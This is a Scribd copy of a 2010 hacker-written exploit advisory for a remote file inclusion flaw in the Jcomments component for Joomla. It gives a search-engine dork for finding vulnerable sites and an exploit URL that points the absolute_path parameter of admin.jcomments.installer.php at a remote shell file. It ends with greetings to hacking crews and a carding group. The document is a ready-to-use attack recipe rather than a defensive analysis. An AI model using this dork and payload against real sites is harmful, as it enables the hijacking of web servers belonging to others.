Scribd
Upload
4K views

Com Jcomments Exploit

This document describes a remote file inclusion (RFI) vulnerability in the Jcomments component for Joomla. An attacker can exploit this vulnerability by appending an absolute path parameter to the admin.jcomments.installer.php file to include and execute malicious code from an external server. The document provides details on the affected software, a potential exploit, and a greeting to various hacking groups.

Uploaded by

Dawflin Daratista
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PDF, TXT or read online on Scribd
4K views

Com Jcomments Exploit

This document describes a remote file inclusion (RFI) vulnerability in the Jcomments component for Joomla. An attacker can exploit this vulnerability by appending an absolute path parameter to the admin.jcomments.installer.php file to include and execute malicious code from an external server. The document provides details on the affected software, a potential exploit, and a greeting to various hacking groups.

Uploaded by

Dawflin Daratista
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 2

joomlajcomments-rfi.

txt
http://www.securityhome.eu/exploits/exploit.php?eid=14003589354cda7bd369c232.67723563

joomlajcomments-rfi.txt
Article URL

exploit.php?eid=14003589354cda7bd369c232.67723563
Author

SecurityHome.eu
Published: 10 November 2010

=========================================================
Joomla Component Jcomments RFI Vulnerability
=========================================================
[+]Title : Joomla Component Jcomments RFI Vulnerability
[+]Software : Jcomments
[+]Vendor : http://www.joomlatune.com/
[+]Download : http://www.joomlatune.com/jcomments-downloads.html
[+]Author : jos_ali_joe
[+]Contact : josalijoe[at]yahoo[dot]com
[+]Home : http://josalijoe.wordpress.com/
.___
.___
.__
_________
.___
| | ____ __| _/ ____ ____ ____ ______|__|_____ ____ \_ ___ ____ __| _/ ____ _______
| |/
/ __ | / _ / _/ __ / ___/| |\__ / /
/ / _ / __ | _/ __ \_ __ \n| || | / /_/ | ( <_> )| | \
___/ \___ | | / __ \_| | \ \____( <_> )/ /_/ | ___/ | | /
|___||___| /\____ | \____/ |___| / \___ >/____ >|__|(____ /|___| / \______ / \____/ \____ | \___ > |__|
/
/
/
/
/
/
/
/
/
/

########################################################################
Dork : inurl:index.php?option="com_jcomments"
########################################################################
-----------------------------------------------------------------------RFI Exploit
Exploit :
http://example.com/administrator/components/com_jcomments/admin.jcomments.installer.php?absolute_path
Page 1/2

joomlajcomments-rfi.txt
http://www.securityhome.eu/exploits/exploit.php?eid=14003589354cda7bd369c232.67723563

=[ Shell txt ]
--------------------------------------------------------------------------

Greets For :
./Devilzc0de crew - Kebumen Cyber - Explore Crew - Indonesian Hacker - Tecon Crew - Security Hub
./Byroe Net - Yogya Carderlink - anten4 - Security Reason - Packetstorm Security
My Team : ./Indonesian Coder & inj3ct0r
Special Thanks :
/. google.com

[+] Note :
Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban.
Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban,
Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.

Page 2/2

You might also like